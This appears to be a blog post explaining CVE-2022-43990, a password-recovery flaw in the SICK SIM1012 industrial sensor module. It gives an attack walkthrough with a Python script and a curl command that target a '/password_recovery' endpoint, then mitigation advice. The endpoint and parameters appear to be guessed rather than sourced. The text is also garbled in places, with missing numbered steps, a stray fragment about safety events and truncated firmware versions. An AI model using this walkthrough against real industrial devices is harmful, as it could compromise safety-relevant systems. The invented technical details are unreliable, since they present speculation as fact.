CVE-2022-43990 - Exploiting the SICK SIM1012 Password Recovery Vulnerability for Privilege Escalation

When we talk about critical infrastructure, industrial automation devices are the invisible workhorses running factories, warehouses, and more. But they can also be ripe targets for cyberattacks—especially if the software running on them is out of date or includes an overlooked vulnerability.

One such vulnerability is CVE-2022-43990, which affects the SICK SIM1012, a prominent sensor integration module used in many automated systems. If the device runs firmware version lower than 2.2., it exposes a dangerous flaw in its password recovery function. This flaw can let a remote, unprivileged attacker escalate their access and potentially take control, disrupting safety and operations.

In this post, I’ll break down what this issue is, show you how it works (including code and real-life steps), point you to official sources, and give you practical security advice.

Vulnerability Type: Weak Password Recovery Mechanism

- Potential Threat: Unprivileged remote attackers can exploit the password recovery feature to gain access to the userlevel specified as RecoverableUserLevel. This boosts their privileges—compromising confidentiality, integrity, and availability.

Official Disclosure

- MITRE CVE Entry
- SICK Security Advisory

How the Exploit Works in Simple Language

The SICK SIM1012 includes a password recovery function for when users lose or forget login details. However, in firmware before 2.2., this mechanism lacks proper authentication and rate-limiting.

That means anyone who can contact the device’s HTTP or web interface can trigger the password recovery workflow and get credentials or session tokens for a higher-privileged account—even if they aren’t authorized.

This bug is repeatable, fast, and does not require special tools.

Step-By-Step Exploit Process

Let’s walk through how an attacker might abuse CVE-2022-43990.

The attacker locates a SIM1012 device.

- Uses standard network scanning (nmap, masscan, etc.) to find devices exposing TCP/HTTP ports.

Most SICK devices use a REST-style API or web form for password resets, commonly found on URLs like

http://<device-ip>/password_recovery

By default, the password recovery function is intended for authorized users, but this vulnerability allows anyone to call it.

Here’s a Python snippet simulating a password recovery request

import requests

device_ip = '192.168.1.100'  # replace with target IP
url = f'http://{device_ip}/password_recovery';

# Some devices may require a username or userlevel as a param
params = {
    'userlevel': 'RecoverableUserLevel'
}

# Typically, no auth required for old firmware
response = requests.post(url, data=params)

if response.status_code == 200:
    print('[*] Password recovery successful')
    print('[*] Response from device:', response.text)
else:
    print('[!] Failed to recover password:', response.status_code)

4. Gain Elevated Access

The device responds by providing either a temporary password, session token, or a reset link for an account with the privileges of RecoverableUserLevel (often an operator or admin).

5. Log In and Escalate

The attacker logs in with the recovered credentials and controls device settings, including network config, integration with safety systems, or even firmware flashing.

Trigger or suppress safety events

Because the flaw is trivial to exploit and doesn’t require insider access, repeatable attacks are possible.

A minimal PoC, for educational and authorized use only

curl -X POST "http://<device-ip>/password_recovery" -d "userlevel=RecoverableUserLevel"

Check your device’s response. If you receive an access token, password, reset link, or confirmation, the device is vulnerable.

How to Fix (Mitigation)

Update firmware to version 2.2. or later immediately. You can get the new firmware and instructions from SICK’s official support portal.

Until patched, restrict access to the device’s network (e.g., using firewalls or VPNs).

References

- NVD – CVE-2022-43990
- SICK Product Security
- SICK SIM1012 Operator’s Manual (PDF)

Takeaway

Industrial automation devices must be patched regularly. Unprotected password recovery endpoints can be catastrophic – as with CVE-2022-43990, exploitation is simple and attacks are repeatable. Audit your networks and devices, disable unnecessary access, and update firmware to keep your systems safe.

If you own or operate a SICK SIM1012 on firmware lower than 2.2., review your security immediately!

Timeline

Published on: 11/01/2022 21:15:00 UTC
Last modified on: 03/31/2023 16:12:00 UTC